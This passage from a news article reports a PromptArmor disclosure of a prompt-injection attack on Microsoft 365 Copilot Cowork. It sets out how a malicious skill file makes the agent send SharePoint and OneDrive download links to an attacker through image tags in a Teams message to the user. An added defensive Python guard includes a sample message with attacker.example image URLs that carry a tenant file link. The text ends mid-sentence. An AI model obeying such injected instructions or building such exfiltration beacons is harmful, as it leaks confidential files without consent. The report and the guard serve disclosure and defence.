Microsoft Copilot Cowork hit by major vulnerability: AI Agent automatically leaks confidential enterprise files when faced with prompt injection attacks
動區 BlockTempo, 2026-05-26 01:30:17

Security firm PromptArmor has disclosed a prompt injection vulnerability in Microsoft 365 Copilot Cowork that allows attackers to exfiltrate confidential files from enterprise SharePoint and OneDrive via a malicious skill file.

(Previous coverage: GitHub Copilot halts self-service subscriptions: AI usage spirals out of control, affordable plan economics collapse)

(Background: The complete guide to Claude Cowork: Transforming AI from a chat assistant into your digital employee)

PromptArmor released a threat intelligence report last week identifying a fully reproducible data exfiltration attack chain in the Microsoft 365 Copilot Cowork feature. In tests, the attack succeeded 5 out of 5 times. The researchers showed that an attacker need only embed 5 lines of malicious instructions in an 81-line skill configuration file for the AI agent to exfiltrate confidential enterprise files from SharePoint and OneDrive to an attacker-controlled server, without the user's knowledge.

The issue is not limited to a single model. Both Claude Opus 4.7 and Claude Sonnet 4.6 were confirmed to be affected, with Claude Opus 4.7 behaving more "aggressively": it proactively expanded its search scope and added every file the victim had opened in the current week's Cowork sessions to the exfiltration list.

The key to the attack is a discrepancy between official documentation and actual behavior. Microsoft's documentation explicitly states: "Cowork will ask for your consent before performing sensitive actions, such as sending emails or posting messages in Teams." PromptArmor's researchers found during testing, however, that this rule is bypassed when the recipient is the user themselves. When sending an email or a Teams message to oneself, Copilot Cowork executes automatically without any authorization confirmation window, and no user setting changes this behavior.
This gap is the critical link in the entire attack chain. Copilot Cowork is a Frontier feature of Microsoft 365 that uses Microsoft Graph to obtain the user's full cloud permissions, allowing it to read and manipulate data across the entire enterprise tenant. In other words, it can see everything the user can see, including financial reports on SharePoint, HR data in OneDrive, and every file containing personally identifiable information (PII).

The attack chain consists of six steps:

Step 1: The victim has sensitive files containing PII or financial data stored in SharePoint or OneDrive.

Step 2: The victim downloads a skill configuration file from the internet and uploads it to Copilot Cowork, a routine operation equivalent to installing a plugin. Cowork's skill files are loaded automatically from a specific path in the user's OneDrive, which gives administrators very limited visibility into them.

Step 3: The victim asks Copilot Cowork to summarize the week's work, which triggers execution of the skill.

Step 4: The injected instructions manipulate the agent into obtaining a "pre-authenticated download link" for each file and then using malicious HTML image tags to send those links as query arguments to the attacker's server. A pre-authenticated download link is, simply put, a URL that carries its own authorization: anyone who obtains it can download the file directly, without logging into a Microsoft account.

Step 5: The agent sends a Teams message to the user themselves with the malicious image tags embedded. No user authorization is required at any point, and the malicious content is completely invisible to the user; even when the message is opened, nothing looks abnormal.

Step 6: The moment the user opens the Teams message, the browser automatically loads the image, transmitting the pre-authenticated download links to the attacker's server, from which the attacker can download all the files at any time.
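The channel in steps 4 to 6 only works if the recipient's client fetches a remote image whose URL carries a tenant link in its query string. A pre-send guard that inspects agent output for exactly that pattern is one mitigation a defender can put in front of the messaging and mail connectors. The code below is an added example, not code from the article, from PromptArmor, or from Microsoft's Cowork; the trusted-host list, the sensitive-host list, the host names and the sample message are all constructed for the demonstration.

```python
"""Added example (not code from the BlockTempo article, PromptArmor, or Microsoft):
a pre-send guard that scans text an AI agent is about to post (a Teams message,
an e-mail body) for remote image references that could serve as a zero-click
exfiltration channel, and rewrites them so the recipient's client never issues
the request. All host lists and the sample message are constructed."""

import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Assumption: image hosts the tenant trusts to render inline.
ALLOWED_IMAGE_HOSTS = {"teams.microsoft.com", "graph.microsoft.com"}

# Assumption: hosts whose links must never travel inside someone else's query string.
SENSITIVE_LINK_HOSTS = ("sharepoint.com", "onedrive.com", "1drv.ms", "graph.microsoft.com")

# HTML <img ... src="..."> (either quote style) and Markdown ![alt](url)
HTML_IMG_RE = re.compile(r"<img\b[^>]*?\bsrc\s*=\s*[\"']([^\"']+)[\"'][^>]*>", re.I)
MD_IMG_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")


def embedded_urls(src):
    """Return any URLs carried inside the query string of an image source."""
    hits = []
    for _, value in parse_qsl(urlsplit(src).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl already decodes once; double-encoding is common
        if value.lower().startswith(("http://", "https://")):
            hits.append(value)
    return hits


def classify_image_source(src):
    """Reasons to block `src`; an empty list means the reference is acceptable."""
    host = (urlsplit(src).hostname or "").lower()
    smuggled = embedded_urls(src)
    reasons = []
    if host not in ALLOWED_IMAGE_HOSTS:
        reasons.append("external_host")
    if smuggled:
        reasons.append("url_in_query")
    if any((urlsplit(u).hostname or "").lower().endswith(SENSITIVE_LINK_HOSTS) for u in smuggled):
        reasons.append("tenant_link_in_query")
    return reasons


def audit_outbound_images(text):
    """List every image reference in `text` that should not be sent as-is."""
    findings = []
    for regex, kind in ((HTML_IMG_RE, "html"), (MD_IMG_RE, "markdown")):
        for m in regex.finditer(text):
            reasons = classify_image_source(m.group(1))
            if reasons:
                findings.append({"kind": kind, "src": m.group(1), "reasons": reasons})
    return findings


def neutralize_outbound_images(text):
    """Replace flagged image references with inert text; allow-listed ones are kept."""
    def swap(m):
        src = m.group(1)
        if classify_image_source(src):
            return "[remote image blocked: %s]" % (urlsplit(src).hostname or "?")
        return m.group(0)
    return MD_IMG_RE.sub(swap, HTML_IMG_RE.sub(swap, text))


# Constructed sample of what a hijacked agent might post back to the user:
# one benign inline image plus two references (HTML and Markdown) whose query
# string carries a tenant file link. The token value is a placeholder.
LEAK_LINK = "https://contoso.sharepoint.com/:x:/r/Finance/Q2.xlsx?token=PLACEHOLDER"
SAMPLE_MESSAGE = "\n".join([
    "Weekly summary attached.",
    '<img src="https://teams.microsoft.com/static/ok.png" alt="logo">',
    '<img src="https://attacker.example/t.png?u=%s" width="1" height="1">' % quote(LEAK_LINK, safe=""),
    "![status](https://attacker.example/m.png?u=%s)" % quote(LEAK_LINK, safe=""),
])

if __name__ == "__main__":
    for finding in audit_outbound_images(SAMPLE_MESSAGE):
        print(finding["kind"], finding["reasons"], finding["src"][:60])
    print(neutralize_outbound_images(SAMPLE_MESSAGE))
```

The guard is deliberately conservative: any image host outside the allow-list is blocked even when no link is smuggled, because a one-pixel beacon to an unknown host leaks the fact that the message was opened. Running it on the agent's output before the Teams or mail connector is invoked addresses the channel regardless of which model produced the message.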
PromptArmor's testing reveals a thought-provoking pattern: the more capable the model, the greater the damage in this attack scenario. Initial tests used "Auto" mode, in which the system switches dynamically between Claude Opus 4.7 and Claude Sonnet 4.6. The researchers then verified the attack against Claude Opus 4.7 on its own and found the same injected instructions fully effective. The attack chain ran to completion in every test and did not depend on the user's specific query text; any query that triggered loading of the skill was enough for the injection to succeed.

The persistence of the attack is also concerning. Copilot Cowork supports scheduled tasks, which let users set prompts to run automatically at regular intervals. Once an attacker's injected configuration is scheduled, the victim no longer needs to do anything at all: the attack runs silently on every cycle, continuously exfiltrating enterprise secrets.

PromptArmor stresses that this is not a bug that a single patch can fix, but a systemic risk in the architectural design of enterprise-grade AI agents. When an agent is granted delegated authorization across multiple systems, the collapse of the trust boundary in any one system can become an entry point for a